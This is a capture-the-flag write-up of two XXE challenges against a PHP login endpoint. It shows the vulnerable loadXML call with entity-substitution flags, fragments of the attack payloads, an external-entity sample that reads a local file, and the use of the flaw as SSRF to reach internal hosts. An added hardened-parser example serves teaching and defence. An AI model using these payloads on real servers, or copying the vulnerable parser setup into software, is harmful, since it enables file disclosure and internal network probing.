Two XML challenges from some (forgotten) CTF

Fake XML Cookbook

F12 to view the page source:

function doLogin(){
	var username = $("#username").val();
	var password = $("#password").val();
	if(username == "" || password == ""){
		alert("Please enter the username and password!");
		return;
	}

	// The XML tags were stripped when the page was captured; <username>/<password>
	// are the names doLogin.php reads, the <user> root element is an assumption
	var data = "<user><username>" + username + "</username><password>" + password + "</password></user>";
	$.ajax({
		type: "POST",
		url: "doLogin.php",
		contentType: "application/xml;charset=utf-8",
		data: data,
		dataType: "xml",
		async: false, // the captured copy reads "anysc", a typo jQuery silently ignores
		success: function (result) {
			// The server answers with <result><code>..</code><msg>..</msg></result>
			var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
			var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
			if(code == "0"){
				$(".msg").text(msg + " login fail!");
			}else if(code == "1"){
				$(".msg").text(msg + " login success!");
			}else{
				$(".msg").text("error:" + msg);
			}
		},
		error: function (XMLHttpRequest, textStatus, errorThrown) {
			$(".msg").text(errorThrown + ':' + textStatus);
		}
	});
}

You can see that the data is sent as XML, so the login request body is parsed by an XML parser on the server.

Fire off a payload:

]>
&xxe;111

flag

True XML Cookbook

First I tried to read /flag directly; that only returned an error message, but the doLogin file turned out to be readable:



]>
&file;1

Which gives the source:

//doLogin.php
// The write-up's copy starts at loadXML(); the opening lines below are reconstructed
// so the fragment reads as a whole. The real credentials are not on the page.
<?php
$USERNAME = 'REPLACE_ME';  // placeholder
$PASSWORD = 'REPLACE_ME';  // placeholder
try{
	$xmlfile = file_get_contents('php://input');  // the XML body posted by doLogin()
	$dom = new DOMDocument();
	// LIBXML_NOENT substitutes (external) entities and LIBXML_DTDLOAD fetches
	// external DTDs: this flag pair is the XXE sink
	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
	$creds = simplexml_import_dom($dom);

	$username = $creds->username;
	$password = $creds->password;

	// <result><code>..</code><msg>..</msg></result>: the tags were stripped in
	// extraction; the names are the ones the client-side JS reads back
	if($username == $USERNAME && $password == $PASSWORD){
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
	}else{
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
	}
}catch(Exception $e){
	// The parser's exception text is echoed to the client, which is why the
	// error responses leak file contents and parser details
	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}

header('Content-Type: text/html; charset=utf-8');
echo $result;
?>
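The two parser flags above are the whole story of both challenges: LIBXML_NOENT lets an entity reference pull in file contents, and LIBXML_DTDLOAD lets the DTD itself be fetched from a URL, which is what later turns the bug into an SSRF into 173.17.80.0/24. The following is an added example, not code from the challenge: it puts the weak parser setup next to a hardened one that refuses any DOCTYPE, never enables entity substitution or network access, and returns a generic message instead of the exception text. The helper names, the <user> root element and the credential values are assumptions made for the example.

```php
<?php
// Added example (not the challenge's code): weak parser setup from doLogin.php
// beside a hardened one. Helper names are mine; the credentials are placeholders.

const VALID_USERNAME = 'admin';     // placeholder, constructed for this example
const VALID_PASSWORD = 'changeme';  // placeholder, constructed for this example

// Weak: mirrors doLogin.php. LIBXML_NOENT substitutes external entities and
// LIBXML_DTDLOAD fetches external DTDs, so entity references resolve to files
// and URLs the server can reach.
function parseCredentialsWeak(string $xml): array
{
    $dom = new DOMDocument();
    $dom->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    return ['username' => (string)$creds->username, 'password' => (string)$creds->password];
}

// Hardened: no entity substitution, no network, and any DTD is refused outright,
// so neither internal nor external entity declarations are ever processed.
function parseCredentialsHardened(string $xml): ?array
{
    // Cheap pre-check: a login document has no business carrying a DTD.
    if (preg_match('/<!(?:DOCTYPE|ENTITY)/i', $xml)) {
        return null;
    }
    $previous = libxml_use_internal_errors(true); // keep parser errors out of the response
    $dom = new DOMDocument();
    $ok = $dom->loadXML($xml, LIBXML_NONET);      // deliberately no NOENT, no DTDLOAD
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    if ($ok === false || $dom->doctype !== null) { // belt and braces behind the regex
        return null;
    }
    $creds = simplexml_import_dom($dom);
    if (!isset($creds->username, $creds->password)) {
        return null;
    }
    return ['username' => (string)$creds->username, 'password' => (string)$creds->password];
}

function buildResult(?array $creds): string
{
    // Generic message only: the original echoed $e->getMessage(), which is what
    // leaked file contents and parser errors in the write-up. The username is
    // escaped so it cannot inject tags into the XML response either.
    if ($creds === null) {
        return "<result><code>3</code><msg>malformed request</msg></result>";
    }
    $code = ($creds['username'] === VALID_USERNAME && $creds['password'] === VALID_PASSWORD) ? 1 : 0;
    $safeName = htmlspecialchars($creds['username'], ENT_QUOTES | ENT_XML1);
    return sprintf("<result><code>%d</code><msg>%s</msg></result>", $code, $safeName);
}

// Constructed inputs: a normal login and a body carrying the DTD shape from the write-up.
$benign  = '<user><username>admin</username><password>changeme</password></user>';
$hostile = '<!DOCTYPE user [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'
         . '<user><username>&xxe;</username><password>x</password></user>';

echo buildResult(parseCredentialsHardened($benign)), "\n";   // code 1
echo buildResult(parseCredentialsHardened($hostile)), "\n";  // code 3, file never opened
// parseCredentialsWeak($hostile)['username'] would instead hold the contents of
// /etc/hostname, which is exactly the behaviour used against doLogin.php above.
```

Dropping the two flags is necessary but not sufficient on its own: LIBXML_NONET blocks the http:// fetches that made the SSRF possible, and rejecting any DOCTYPE removes the entity machinery entirely, which is the setting to check for in code review of any PHP endpoint that calls loadXML on a request body.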

In the end the flag comes from using the XXE as an SSRF to read files on the internal network:

// /etc/hosts
127.0.0.1	localhost
::1		localhost ip6-localhost ip6-loopback
fe00::0		ip6-localnet
ff00::0		ip6-mcastprefix
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
173.17.80.9		osrc

Internal IP: 173.17.80.9

// /proc/net/arp
IP address       HW type     Flags       HW address            Mask     Device
173.17.80.2      0x1         0x2         02:42:ad:11:50:02     *        eth0
173.17.80.12     0x1         0x2         02:42:ad:11:50:0c     *        eth0

Finally, trying 173.17.80.10 gave the flag.
